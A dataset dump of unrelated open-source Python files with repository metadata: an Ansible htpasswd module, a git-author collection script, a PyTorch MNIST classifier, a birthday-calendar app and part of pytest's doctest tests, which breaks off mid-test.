#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2013, Nimbis Services, Inc. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = """ module: htpasswd version_added: "1.3" short_description: manage user files for basic authentication description: - Add and remove username/password entries in a password file using htpasswd. - This is used by web servers such as Apache and Nginx for basic authentication. options: path: required: true aliases: [ dest, destfile ] description: - Path to the file that contains the usernames and passwords name: required: true aliases: [ username ] description: - User name to add or remove password: required: false description: - Password associated with user. - Must be specified if user does not exist yet. crypt_scheme: required: false choices: ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"] default: "apr_md5_crypt" description: - Encryption scheme to be used. As well as the four choices listed here, you can also use any other hash supported by passlib, such as md5_crypt and sha256_crypt, which are linux passwd hashes. If you do so the password file will not be compatible with Apache or Nginx state: required: false choices: [ present, absent ] default: "present" description: - Whether the user entry should be present or not create: required: false type: bool default: "yes" description: - Used with C(state=present). If specified, the file will be created if it does not already exist. If set to "no", will fail if the file does not exist notes: - "This module depends on the I(passlib) Python library, which needs to be installed on all target systems." - "On Debian, Ubuntu, or Fedora: install I(python-passlib)." - "On RHEL or CentOS: Enable EPEL, then install I(python-passlib)." requirements: [ passlib>=1.6 ] author: "Ansible Core Team" extends_documentation_fragment: files """ EXAMPLES = """ # Add a user to a password file and ensure permissions are set - htpasswd: path: /etc/nginx/passwdfile name: janedoe password: '9s36?;fyNp' owner: root group: www-data mode: 0640 # Remove a user from a password file - htpasswd: path: /etc/apache2/passwdfile name: foobar state: absent # Add a user to a password file suitable for use by libpam-pwdfile - htpasswd: path: /etc/mail/passwords name: alex password: oedu2eGh crypt_scheme: md5_crypt """ import os import tempfile from distutils.version import LooseVersion from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native try: from passlib.apache import HtpasswdFile, htpasswd_context from passlib.context import CryptContext import passlib except ImportError: passlib_installed = False else: passlib_installed = True apache_hashes = ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"] def create_missing_directories(dest): destpath = os.path.dirname(dest) if not os.path.exists(destpath): os.makedirs(destpath) def present(dest, username, password, crypt_scheme, create, check_mode): """ Ensures user is present Returns (msg, changed) """ if crypt_scheme in apache_hashes: context = htpasswd_context else: context = CryptContext(schemes=[crypt_scheme] + apache_hashes) if not os.path.exists(dest): if not create: raise ValueError('Destination %s does not exist' % dest) if check_mode: return ("Create %s" % dest, True) create_missing_directories(dest) if LooseVersion(passlib.__version__) >= LooseVersion('1.6'): ht = HtpasswdFile(dest, new=True, default_scheme=crypt_scheme, context=context) else: ht = HtpasswdFile(dest, autoload=False, default=crypt_scheme, context=context) if getattr(ht, 'set_password', None): ht.set_password(username, password) else: ht.update(username, password) ht.save() return ("Created %s and added %s" % (dest, username), True) else: if LooseVersion(passlib.__version__) >= LooseVersion('1.6'): ht = HtpasswdFile(dest, new=False, default_scheme=crypt_scheme, context=context) else: ht = HtpasswdFile(dest, default=crypt_scheme, context=context) found = None if getattr(ht, 'check_password', None): found = ht.check_password(username, password) else: found = ht.verify(username, password) if found: return ("%s already present" % username, False) else: if not check_mode: if getattr(ht, 'set_password', None): ht.set_password(username, password) else: ht.update(username, password) ht.save() return ("Add/update %s" % username, True) def absent(dest, username, check_mode): """ Ensures user is absent Returns (msg, changed) """ if LooseVersion(passlib.__version__) >= LooseVersion('1.6'): ht = HtpasswdFile(dest, new=False) else: ht = HtpasswdFile(dest) if username not in ht.users(): return ("%s not present" % username, False) else: if not check_mode: ht.delete(username) ht.save() return ("Remove %s" % username, True) def check_file_attrs(module, changed, message): file_args = module.load_file_common_arguments(module.params) if module.set_fs_attributes_if_different(file_args, False): if changed: message += " and " changed = True message += "ownership, perms or SE linux context changed" return message, changed def main(): arg_spec = dict( path=dict(required=True, aliases=["dest", "destfile"]), name=dict(required=True, aliases=["username"]), password=dict(required=False, default=None, no_log=True), crypt_scheme=dict(required=False, default="apr_md5_crypt"), state=dict(required=False, default="present"), create=dict(type='bool', default='yes'), ) module = AnsibleModule(argument_spec=arg_spec, add_file_common_args=True, supports_check_mode=True) path = module.params['path'] username = module.params['name'] password = module.params['password'] crypt_scheme = module.params['crypt_scheme'] state = module.params['state'] create = module.params['create'] check_mode = module.check_mode if not passlib_installed: module.fail_json(msg="This module requires the passlib Python library") # Check file for blank lines in effort to avoid "need more than 1 value to unpack" error. try: f = open(path, "r") except IOError: # No preexisting file to remove blank lines from f = None else: try: lines = f.readlines() finally: f.close() # If the file gets edited, it returns true, so only edit the file if it has blank lines strip = False for line in lines: if not line.strip(): strip = True break if strip: # If check mode, create a temporary file if check_mode: temp = tempfile.NamedTemporaryFile() path = temp.name f = open(path, "w") try: [f.write(line) for line in lines if line.strip()] finally: f.close() try: if state == 'present': (msg, changed) = present(path, username, password, crypt_scheme, create, check_mode) elif state == 'absent': if not os.path.exists(path): module.exit_json(msg="%s not present" % username, warnings="%s does not exist" % path, changed=False) (msg, changed) = absent(path, username, check_mode) else: module.fail_json(msg="Invalid state: %s" % state) check_file_attrs(module, changed, msg) module.exit_json(msg=msg, changed=changed) except Exception as e: module.fail_json(msg=to_native(e)) if __name__ == '__main__': main()
31.926471
110
0.630815
33d3ad77b7e98a7f0c9621d698f0aed0dca4ca4a
2,032
py
Python
get_authors.py
fermi-controls/redmine-git-authors
2c8d52a7ddcebbd229e9735074e4a8def7e44734
[ "MIT" ]
null
null
null
get_authors.py
fermi-controls/redmine-git-authors
2c8d52a7ddcebbd229e9735074e4a8def7e44734
[ "MIT" ]
null
null
null
get_authors.py
fermi-controls/redmine-git-authors
2c8d52a7ddcebbd229e9735074e4a8def7e44734
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 """Get the list of unique authors and contributors from Redmine.""" import json from pathlib import Path import subprocess names = set() output_path = Path('./authors.txt') def xlat_with(input_dict): """Translate the author name.""" input_keys = input_dict.keys() return lambda v: v if v not in input_keys else input_dict[v] def mk_key(combined_name): """Make a key from the author's name.""" try: [first_name, last_name] = combined_name.split() except ValueError as errormsg: print(errormsg, '\n', combined_name) # ! is a low value in the ASCII table # This filters the author names that need to be fixed to the top return ['!FIX', combined_name] return [last_name, first_name] with open('projects.json', encoding='utf8') as f_projects, \ open('usernames.json', encoding='utf8') as f_usernames: projects = json.load(f_projects) usernames_map = json.load(f_usernames) usernames = usernames_map.keys() for project in projects.keys(): for repo in projects[project]: result = subprocess.run([ 'ssh', '-tx', f'p-{project}@cdcvs.fnal.gov', f'git -C /cvs/projects/{repo} log --pretty=\'%an%n%cn\'', '|', 'sort', '-u'], stdout=subprocess.PIPE, check=True, encoding='utf8') if result.returncode != 0: print('Return code', result.returncode, f'{project}/{repo} failed.') continue if result.stdout.startswith('fatal:'): print(f'{project}/{repo} failed.') print(result.stdout) continue results = result.stdout.splitlines() subbed_names = map(xlat_with(usernames_map), results) names |= set(subbed_names) with open(output_path, 'w', encoding='utf8') as f: for name in sorted(names, key=mk_key): f.write(f'{name}\n') print('Output author names to', output_path.absolute())
31.261538
84
0.607283
1fe4445681c2a5bd1b10ef6585e60db930cd8a10
455
py
Python
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py
liuxiaomiao123/NeuroMathAcademy
16a7969604a300bf9fbb86f8a5b26050ebd14c65
[ "CC-BY-4.0" ]
2
2020-07-03T04:39:09.000Z
2020-07-12T02:08:31.000Z
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py
NinaHKivanani/course-content
3c91dd1a669cebce892486ba4f8086b1ef2e1e49
[ "CC-BY-4.0" ]
1
2020-06-22T22:57:03.000Z
2020-06-22T22:57:03.000Z
tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py
NinaHKivanani/course-content
3c91dd1a669cebce892486ba4f8086b1ef2e1e49
[ "CC-BY-4.0" ]
1
2021-03-29T21:08:26.000Z
2021-03-29T21:08:26.000Z
def plot_tuning(): """Plot the tuning curve of a random neuron""" neuron_indx = np.random.choice(n_neurons) # pick random neuron plt.plot(np.rad2deg(stimuli), resp[:, neuron_indx], '.') # plot its responses as a function of stimulus orientation plt.title('neuron %i' % neuron_indx) plt.xlabel('stimulus orientation ($^o$)') plt.ylabel('neural response') plt.xticks(np.linspace(0, 360, 5)) plt.show() with plt.xkcd(): plot_tuning()
32.5
118
0.69011
9d394e96942e4c5f65e52e1f00e476f2d4883fa9
6,542
py
Python
mlp/mlp.py
Yuxiang-Wei/DeepLearning
5ad27384a6b45b97700094fe979a67b0d1522be8
[ "MIT" ]
7
2019-06-28T15:21:20.000Z
2020-04-22T14:35:35.000Z
mlp/mlp.py
csyxwei/DeepLearning
5ad27384a6b45b97700094fe979a67b0d1522be8
[ "MIT" ]
null
null
null
mlp/mlp.py
csyxwei/DeepLearning
5ad27384a6b45b97700094fe979a67b0d1522be8
[ "MIT" ]
1
2019-07-02T03:33:37.000Z
2019-07-02T03:33:37.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 19-5-10 # @Author : wyxiang # @File : mlp.py # @Env: Ubuntu16.04 Python3.6 Pytorch0.4.1 import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets, transforms from torch.utils.data.dataloader import DataLoader from optparse import OptionParser import os # 判断CUDA是否可用 if torch.cuda.is_available(): device = torch.device('cuda') else: device = torch.device('cpu') print('Using PyTorch version:', torch.__version__, ' Device:', device) img_size = 28 output_size = 10 model_dir = './checkpoints/lastest.pkl' # 模型存放地址 # 定义模型 class MLP(nn.Module): def __init__(self): super(MLP, self).__init__() self.linear1 = nn.Linear(img_size * img_size, 1024) # 隐层1, [784,1] -> [1024,1] self.linear2 = nn.Linear(1024, 256) # 隐层2, [1024,1] -> [256,1] self.linear3 = nn.Linear(256, output_size) # 隐层3 [256,1] -> [10,1] def forward(self, x): # 将图片展开成一维,以匹配的输入层大小,即[batch, 1, img_size, img_size] -> [batch, img_size*img_size] x = x.view(-1, img_size * img_size) x = F.relu(self.linear1(x)) # 经过隐层1并使用relu函数激活 x = F.relu(self.linear2(x)) # 经过隐层2并使用relu函数激活 return F.log_softmax(self.linear3(x), dim=1) # 经过隐层3,并最终经过一个log_softmax层做分类输出 def load_data(train=True, batch_size=50): """ 加载数据集 :param train: 训练集 or 测试集 :param batch_size: batch的大小 :return: 返回加载好的Dataloader """ # 加载MNIST数据集,若不存在则下载 dataset = datasets.MNIST('./data', train=train, download=True, transform=transforms.ToTensor()) if train: # 分为训练集和验证集 train, val = torch.utils.data.random_split(dataset, [50000, 10000]) # 随机打乱训练集 train_loader = DataLoader(dataset=train, batch_size=batch_size, shuffle=True) # 准备验证集 val_loader = DataLoader(dataset=val, batch_size=batch_size, shuffle=True) return train_loader, val_loader else: # 准备测试集 test_loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False) return test_loader, None def train(model, epochs, batch_size, lr, log_interval=200): """ 训练网络模型 :param model: 待训练网络 :param epochs: 迭代次数 :param batch_size: batch size :param lr: 学习率 :param log_interval: 打印loss的间隔次数 :return: """ # 加载训练集,验证集 train_loader, val_loader = load_data(train=True, batch_size=batch_size) # 使用Adam优化器 optimizer = torch.optim.Adam(model.parameters(), lr=lr) # optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.5) # 使用交叉熵损失 criterion = nn.CrossEntropyLoss() for i in range(1, epochs + 1): # model设置为训练模式 model.train() # 遍历每个batch for batch_idx, (data, target) in enumerate(train_loader): # 若GPU可用,拷贝数据至GPU data = data.to(device) target = target.to(device) # 将梯度缓存置0 optimizer.zero_grad() # 执行一次前向传播 output = model(data) # 计算loss loss = criterion(output, target) # 反向传播 loss.backward() # 更新权值 optimizer.step() # 打印loss信息 if batch_idx % log_interval == 0: print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format( i, batch_idx * len(data), len(train_loader.dataset), 100. * batch_idx / len(train_loader), loss.data.item())) # 保存模型参数, 这里设定每个epoch保存一次 save_dir = './checkpoints' if not os.path.exists(save_dir): os.makedirs(save_dir) torch.save(model.state_dict(), os.path.join(save_dir, 'lastest.pkl')) # 测试模型在验证集上的正确率 validate(model, val_loader, criterion) def test(model, batch_size): """ 测试模型在测试集上的正确率 :param model: 模型 :param batch_size: batch size :return: """ test_loader, _ = load_data(train=False, batch_size=batch_size) criterion = nn.CrossEntropyLoss() validate(model, test_loader, criterion) def validate(model, data_loader, criterion): """ 测试模型在给定数据上的正确率 :param model: 模型 :param data_loader: 给定数据集 :param criterion: 损失函数 :return: """ # 设定模型为执行模式 model.eval() val_loss, correct = 0, 0 for data, target in data_loader: # 若GPU可用,拷贝数据至GPU data = data.to(device) target = target.to(device) # 前向传播 output = model(data) # 计算loss val_loss += criterion(output, target).data.item() # 获得概率最大的下标,即分类结果 pred = output.data.max(1)[1] # 计算正确个数 correct += pred.eq(target.data).cpu().sum() val_loss /= len(data_loader) accuracy = 100. * correct.to(torch.float32) / len(data_loader.dataset) print('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format( val_loss, correct, len(data_loader.dataset), accuracy)) def get_args(): """ 解析命令行参数 :return: 参数列表 """ parser = OptionParser() parser.add_option('-t', '--train', action="store_true", dest='train', default=True, help='train model') parser.add_option("-v", '--test', action="store_false", dest="train", help='test model') parser.add_option('-e', '--epochs', dest='epochs', default=10, type='int', help='number of epochs') parser.add_option('-b', '--batch_size', dest='batchsize', default=50, type='int', help='batch size') parser.add_option('-l', '--lr', dest='lr', default=0.001, type='float', help='learning rate') (options, args) = parser.parse_args() return options if __name__ == '__main__': args = get_args() model = MLP().to(device) if args.train: print(model) train(model, epochs=args.epochs, batch_size=args.batchsize, lr=args.lr) else: if not os.path.exists(model_dir): print('model not found') else: model.load_state_dict(torch.load(model_dir)) test(model, batch_size=args.batchsize) # 运行示例 ### 训练模型 # python mlp.py --train True --epochs 10 --batch_size 50 --lr 1e-3 ### 测试模型 # python mlp.py --test True --batch_size 50
31.301435
90
0.576888
e1a083851a06d03379c8ce0652a6846ce73ba485
2,110
py
Python
birthday_calendar/__main__.py
Raiytak/Birthday-Calendar
879a268439503bc3debec9fca6363c9da44829a7
[ "MIT" ]
null
null
null
birthday_calendar/__main__.py
Raiytak/Birthday-Calendar
879a268439503bc3debec9fca6363c9da44829a7
[ "MIT" ]
null
null
null
birthday_calendar/__main__.py
Raiytak/Birthday-Calendar
879a268439503bc3debec9fca6363c9da44829a7
[ "MIT" ]
null
null
null
import argparse from .accessor import BirthdayAccessor from .convert import convertDictToBirthdays from .app_shell import AppShell from .app_func import AppFunctionalities """ Main script Handles the arguments and craetes a mixin with the shell, core functions and accessor """ class MainApp(AppFunctionalities, AppShell): def __init__(self, birthday_accessor, birthday_convertor, *args, **kwargs): self.birthday_accessor = birthday_accessor self.birthday_convertor = birthday_convertor super().__init__(*args, **kwargs) def birthdays_data(self): return birthday_accessor.getData() def birthdays_data_from_user(self): if birthday_accessor.user_file: return birthday_accessor.getDataOfJson(birthday_accessor.user_file) return {} @property def birthdays(self): data = self.birthdays_data() return self.birthday_convertor(data) @property def birthdays_from_user(self): data = self.birthdays_data_from_user() return self.birthday_convertor(data) def saveBirthday(self, birthday): return self.birthday_accessor.saveBirthday(birthday) def saveBirthdayInCache(self, birthday): return self.birthday_accessor.saveBirthdayInCache(birthday) def deleteIdentifer(self, identifier): return self.birthday_accessor.removeBirthdayWithIdentifier(identifier) def setUserFilePath(self, path): self.birthday_accessor.setUserFilePath(path) def clearCache(self): self.birthday_accessor.clearCache() parser = argparse.ArgumentParser() parser.add_argument( "-p", "--path", help="Path to the json containing the information on the birthdays' person name and date", type=str, ) parser.add_argument( "-y", "--years", help="Number of years around today's year on which the birthdays are added to the calendar (minimum 1)", type=int, ) args = parser.parse_args() birthday_accessor = BirthdayAccessor(args.path) main_app = MainApp(birthday_accessor, convertDictToBirthdays, args.years) main_app.launchCalendar()
28.90411
108
0.732227
b15067f15e9b299586b8c31ce9467c984c2cf2dc
32,516
py
Python
tools/third_party/pytest/testing/test_doctest.py
shs96c/web-platform-tests
61acad6dd9bb99d32340eb41f5146de64f542359
[ "BSD-3-Clause" ]
1
2018-02-26T09:45:53.000Z
2018-02-26T09:45:53.000Z
tools/third_party/pytest/testing/test_doctest.py
shs96c/web-platform-tests
61acad6dd9bb99d32340eb41f5146de64f542359
[ "BSD-3-Clause" ]
null
null
null
tools/third_party/pytest/testing/test_doctest.py
shs96c/web-platform-tests
61acad6dd9bb99d32340eb41f5146de64f542359
[ "BSD-3-Clause" ]
1
2021-04-06T20:06:58.000Z
2021-04-06T20:06:58.000Z
# encoding: utf-8 from __future__ import absolute_import, division, print_function import sys import _pytest._code from _pytest.compat import MODULE_NOT_FOUND_ERROR from _pytest.doctest import DoctestItem, DoctestModule, DoctestTextfile import pytest class TestDoctests(object): def test_collect_testtextfile(self, testdir): w = testdir.maketxtfile(whatever="") checkfile = testdir.maketxtfile(test_something=""" alskdjalsdk >>> i = 5 >>> i-1 4 """) for x in (testdir.tmpdir, checkfile): # print "checking that %s returns custom items" % (x,) items, reprec = testdir.inline_genitems(x) assert len(items) == 1 assert isinstance(items[0], DoctestItem) assert isinstance(items[0].parent, DoctestTextfile) # Empty file has no items. items, reprec = testdir.inline_genitems(w) assert len(items) == 0 def test_collect_module_empty(self, testdir): path = testdir.makepyfile(whatever="#") for p in (path, testdir.tmpdir): items, reprec = testdir.inline_genitems(p, '--doctest-modules') assert len(items) == 0 def test_collect_module_single_modulelevel_doctest(self, testdir): path = testdir.makepyfile(whatever='""">>> pass"""') for p in (path, testdir.tmpdir): items, reprec = testdir.inline_genitems(p, '--doctest-modules') assert len(items) == 1 assert isinstance(items[0], DoctestItem) assert isinstance(items[0].parent, DoctestModule) def test_collect_module_two_doctest_one_modulelevel(self, testdir): path = testdir.makepyfile(whatever=""" '>>> x = None' def my_func(): ">>> magic = 42 " """) for p in (path, testdir.tmpdir): items, reprec = testdir.inline_genitems(p, '--doctest-modules') assert len(items) == 2 assert isinstance(items[0], DoctestItem) assert isinstance(items[1], DoctestItem) assert isinstance(items[0].parent, DoctestModule) assert items[0].parent is items[1].parent def test_collect_module_two_doctest_no_modulelevel(self, testdir): path = testdir.makepyfile(whatever=""" '# Empty' def my_func(): ">>> magic = 42 " def unuseful(): ''' # This is a function # >>> # it doesn't have any doctest ''' def another(): ''' # This is another function >>> import os # this one does have a doctest ''' """) for p in (path, testdir.tmpdir): items, reprec = testdir.inline_genitems(p, '--doctest-modules') assert len(items) == 2 assert isinstance(items[0], DoctestItem) assert isinstance(items[1], DoctestItem) assert isinstance(items[0].parent, DoctestModule) assert items[0].parent is items[1].parent def test_simple_doctestfile(self, testdir): p = testdir.maketxtfile(test_doc=""" >>> x = 1 >>> x == 1 False """) reprec = testdir.inline_run(p, ) reprec.assertoutcome(failed=1) def test_new_pattern(self, testdir): p = testdir.maketxtfile(xdoc=""" >>> x = 1 >>> x == 1 False """) reprec = testdir.inline_run(p, "--doctest-glob=x*.txt") reprec.assertoutcome(failed=1) def test_multiple_patterns(self, testdir): """Test support for multiple --doctest-glob arguments (#1255). """ testdir.maketxtfile(xdoc=""" >>> 1 1 """) testdir.makefile('.foo', test=""" >>> 1 1 """) testdir.maketxtfile(test_normal=""" >>> 1 1 """) expected = set(['xdoc.txt', 'test.foo', 'test_normal.txt']) assert set(x.basename for x in testdir.tmpdir.listdir()) == expected args = ["--doctest-glob=xdoc*.txt", "--doctest-glob=*.foo"] result = testdir.runpytest(*args) result.stdout.fnmatch_lines([ '*test.foo *', '*xdoc.txt *', '*2 passed*', ]) result = testdir.runpytest() result.stdout.fnmatch_lines([ '*test_normal.txt *', '*1 passed*', ]) @pytest.mark.parametrize( ' test_string, encoding', [ (u'foo', 'ascii'), (u'öäü', 'latin1'), (u'öäü', 'utf-8') ] ) def test_encoding(self, testdir, test_string, encoding): """Test support for doctest_encoding ini option. """ testdir.makeini(""" [pytest] doctest_encoding={0} """.format(encoding)) doctest = u""" >>> u"{0}" {1} """.format(test_string, repr(test_string)) testdir._makefile(".txt", [doctest], {}, encoding=encoding) result = testdir.runpytest() result.stdout.fnmatch_lines([ '*1 passed*', ]) def test_doctest_unexpected_exception(self, testdir): testdir.maketxtfile(""" >>> i = 0 >>> 0 / i 2 """) result = testdir.runpytest("--doctest-modules") result.stdout.fnmatch_lines([ "*unexpected_exception*", "*>>> i = 0*", "*>>> 0 / i*", "*UNEXPECTED*ZeroDivision*", ]) def test_docstring_partial_context_around_error(self, testdir): """Test that we show some context before the actual line of a failing doctest. """ testdir.makepyfile(''' def foo(): """ text-line-1 text-line-2 text-line-3 text-line-4 text-line-5 text-line-6 text-line-7 text-line-8 text-line-9 text-line-10 text-line-11 >>> 1 + 1 3 text-line-after """ ''') result = testdir.runpytest('--doctest-modules') result.stdout.fnmatch_lines([ '*docstring_partial_context_around_error*', '005*text-line-3', '006*text-line-4', '013*text-line-11', '014*>>> 1 + 1', 'Expected:', ' 3', 'Got:', ' 2', ]) # lines below should be trimmed out assert 'text-line-2' not in result.stdout.str() assert 'text-line-after' not in result.stdout.str() def test_docstring_full_context_around_error(self, testdir): """Test that we show the whole context before the actual line of a failing doctest, provided that the context is up to 10 lines long. """ testdir.makepyfile(''' def foo(): """ text-line-1 text-line-2 >>> 1 + 1 3 """ ''') result = testdir.runpytest('--doctest-modules') result.stdout.fnmatch_lines([ '*docstring_full_context_around_error*', '003*text-line-1', '004*text-line-2', '006*>>> 1 + 1', 'Expected:', ' 3', 'Got:', ' 2', ]) def test_doctest_linedata_missing(self, testdir): testdir.tmpdir.join('hello.py').write(_pytest._code.Source(""" class Fun(object): @property def test(self): ''' >>> a = 1 >>> 1/0 ''' """)) result = testdir.runpytest("--doctest-modules") result.stdout.fnmatch_lines([ "*hello*", "*EXAMPLE LOCATION UNKNOWN, not showing all tests of that example*", "*1/0*", "*UNEXPECTED*ZeroDivision*", "*1 failed*", ]) def test_doctest_unex_importerror_only_txt(self, testdir): testdir.maketxtfile(""" >>> import asdalsdkjaslkdjasd >>> """) result = testdir.runpytest() # doctest is never executed because of error during hello.py collection result.stdout.fnmatch_lines([ "*>>> import asdals*", "*UNEXPECTED*{e}*".format(e=MODULE_NOT_FOUND_ERROR), "{e}: No module named *asdal*".format(e=MODULE_NOT_FOUND_ERROR), ]) def test_doctest_unex_importerror_with_module(self, testdir): testdir.tmpdir.join("hello.py").write(_pytest._code.Source(""" import asdalsdkjaslkdjasd """)) testdir.maketxtfile(""" >>> import hello >>> """) result = testdir.runpytest("--doctest-modules") # doctest is never executed because of error during hello.py collection result.stdout.fnmatch_lines([ "*ERROR collecting hello.py*", "*{e}: No module named *asdals*".format(e=MODULE_NOT_FOUND_ERROR), "*Interrupted: 1 errors during collection*", ]) def test_doctestmodule(self, testdir): p = testdir.makepyfile(""" ''' >>> x = 1 >>> x == 1 False ''' """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(failed=1) def test_doctestmodule_external_and_issue116(self, testdir): p = testdir.mkpydir("hello") p.join("__init__.py").write(_pytest._code.Source(""" def somefunc(): ''' >>> i = 0 >>> i + 1 2 ''' """)) result = testdir.runpytest(p, "--doctest-modules") result.stdout.fnmatch_lines([ '004 *>>> i = 0', '005 *>>> i + 1', '*Expected:', "* 2", "*Got:", "* 1", "*:5: DocTestFailure" ]) def test_txtfile_failing(self, testdir): p = testdir.maketxtfile(""" >>> i = 0 >>> i + 1 2 """) result = testdir.runpytest(p, "-s") result.stdout.fnmatch_lines([ '001 >>> i = 0', '002 >>> i + 1', 'Expected:', " 2", "Got:", " 1", "*test_txtfile_failing.txt:2: DocTestFailure" ]) def test_txtfile_with_fixtures(self, testdir): p = testdir.maketxtfile(""" >>> dir = getfixture('tmpdir') >>> type(dir).__name__ 'LocalPath' """) reprec = testdir.inline_run(p, ) reprec.assertoutcome(passed=1) def test_txtfile_with_usefixtures_in_ini(self, testdir): testdir.makeini(""" [pytest] usefixtures = myfixture """) testdir.makeconftest(""" import pytest @pytest.fixture def myfixture(monkeypatch): monkeypatch.setenv("HELLO", "WORLD") """) p = testdir.maketxtfile(""" >>> import os >>> os.environ["HELLO"] 'WORLD' """) reprec = testdir.inline_run(p, ) reprec.assertoutcome(passed=1) def test_doctestmodule_with_fixtures(self, testdir): p = testdir.makepyfile(""" ''' >>> dir = getfixture('tmpdir') >>> type(dir).__name__ 'LocalPath' ''' """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(passed=1) def test_doctestmodule_three_tests(self, testdir): p = testdir.makepyfile(""" ''' >>> dir = getfixture('tmpdir') >>> type(dir).__name__ 'LocalPath' ''' def my_func(): ''' >>> magic = 42 >>> magic - 42 0 ''' def unuseful(): pass def another(): ''' >>> import os >>> os is os True ''' """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(passed=3) def test_doctestmodule_two_tests_one_fail(self, testdir): p = testdir.makepyfile(""" class MyClass(object): def bad_meth(self): ''' >>> magic = 42 >>> magic 0 ''' def nice_meth(self): ''' >>> magic = 42 >>> magic - 42 0 ''' """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(failed=1, passed=1) def test_ignored_whitespace(self, testdir): testdir.makeini(""" [pytest] doctest_optionflags = ELLIPSIS NORMALIZE_WHITESPACE """) p = testdir.makepyfile(""" class MyClass(object): ''' >>> a = "foo " >>> print(a) foo ''' pass """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(passed=1) def test_non_ignored_whitespace(self, testdir): testdir.makeini(""" [pytest] doctest_optionflags = ELLIPSIS """) p = testdir.makepyfile(""" class MyClass(object): ''' >>> a = "foo " >>> print(a) foo ''' pass """) reprec = testdir.inline_run(p, "--doctest-modules") reprec.assertoutcome(failed=1, passed=0) def test_ignored_whitespace_glob(self, testdir): testdir.makeini(""" [pytest] doctest_optionflags = ELLIPSIS NORMALIZE_WHITESPACE """) p = testdir.maketxtfile(xdoc=""" >>> a = "foo " >>> print(a) foo """) reprec = testdir.inline_run(p, "--doctest-glob=x*.txt") reprec.assertoutcome(passed=1) def test_non_ignored_whitespace_glob(self, testdir): testdir.makeini(""" [pytest] doctest_optionflags = ELLIPSIS """) p = testdir.maketxtfile(xdoc=""" >>> a = "foo " >>> print(a) foo """) reprec = testdir.inline_run(p, "--doctest-glob=x*.txt") reprec.assertoutcome(failed=1, passed=0) def test_contains_unicode(self, testdir): """Fix internal error with docstrings containing non-ascii characters. """ testdir.makepyfile(u''' # encoding: utf-8 def foo(): """ >>> name = 'с' # not letter 'c' but instead Cyrillic 's'. 'anything' """ ''') result = testdir.runpytest('--doctest-modules') result.stdout.fnmatch_lines([ 'Got nothing', '* 1 failed in*', ]) def test_ignore_import_errors_on_doctest(self, testdir): p = testdir.makepyfile(""" import asdf def add_one(x): ''' >>> add_one(1) 2 ''' return x + 1 """) reprec = testdir.inline_run(p, "--doctest-modules", "--doctest-ignore-import-errors") reprec.assertoutcome(skipped=1, failed=1, passed=0) def test_junit_report_for_doctest(self, testdir): """ #713: Fix --junit-xml option when used with --doctest-modules. """ p = testdir.makepyfile(""" def foo(): ''' >>> 1 + 1 3 ''' pass """) reprec = testdir.inline_run(p, "--doctest-modules", "--junit-xml=junit.xml") reprec.assertoutcome(failed=1) def test_unicode_doctest(self, testdir): """ Test case for issue 2434: DecodeError on Python 2 when doctest contains non-ascii characters. """ p = testdir.maketxtfile(test_unicode_doctest=""" .. doctest:: >>> print( ... "Hi\\n\\nByé") Hi ... Byé >>> 1/0 # Byé 1 """) result = testdir.runpytest(p) result.stdout.fnmatch_lines([ '*UNEXPECTED EXCEPTION: ZeroDivisionError*', '*1 failed*', ]) def test_unicode_doctest_module(self, testdir): """ Test case for issue 2434: DecodeError on Python 2 when doctest docstring contains non-ascii characters. """ p = testdir.makepyfile(test_unicode_doctest_module=""" # -*- encoding: utf-8 -*- from __future__ import unicode_literals def fix_bad_unicode(text): ''' >>> print(fix_bad_unicode('único')) único ''' return "único" """) result = testdir.runpytest(p, '--doctest-modules') result.stdout.fnmatch_lines(['* 1 passed *']) def test_reportinfo(self, testdir): ''' Test case to make sure that DoctestItem.reportinfo() returns lineno. ''' p = testdir.makepyfile(test_reportinfo=""" def foo(x): ''' >>> foo('a') 'b' ''' return 'c' """) items, reprec = testdir.inline_genitems(p, '--doctest-modules') reportinfo = items[0].reportinfo() assert reportinfo[1] == 1 def test_valid_setup_py(self, testdir): ''' Test to make sure that pytest ignores valid setup.py files when ran with --doctest-modules ''' p = testdir.makepyfile(setup=""" from setuptools import setup, find_packages setup(name='sample', version='0.0', description='description', packages=find_packages() ) """) result = testdir.runpytest(p, '--doctest-modules') result.stdout.fnmatch_lines(['*collected 0 items*']) def test_invalid_setup_py(self, testdir): ''' Test to make sure that pytest reads setup.py files that are not used for python packages when ran with --doctest-modules ''' p = testdir.makepyfile(setup=""" def test_foo(): return 'bar' """) result = testdir.runpytest(p, '--doctest-modules') result.stdout.fnmatch_lines(['*collected 1 item*']) class TestLiterals(object): @pytest.mark.parametrize('config_mode', ['ini', 'comment']) def test_allow_unicode(self, testdir, config_mode): """Test that doctests which output unicode work in all python versions tested by pytest when the ALLOW_UNICODE option is used (either in the ini file or by an inline comment). """ if config_mode == 'ini': testdir.makeini(''' [pytest] doctest_optionflags = ALLOW_UNICODE ''') comment = '' else: comment = '#doctest: +ALLOW_UNICODE' testdir.maketxtfile(test_doc=""" >>> b'12'.decode('ascii') {comment} '12' """.format(comment=comment)) testdir.makepyfile(foo=""" def foo(): ''' >>> b'12'.decode('ascii') {comment} 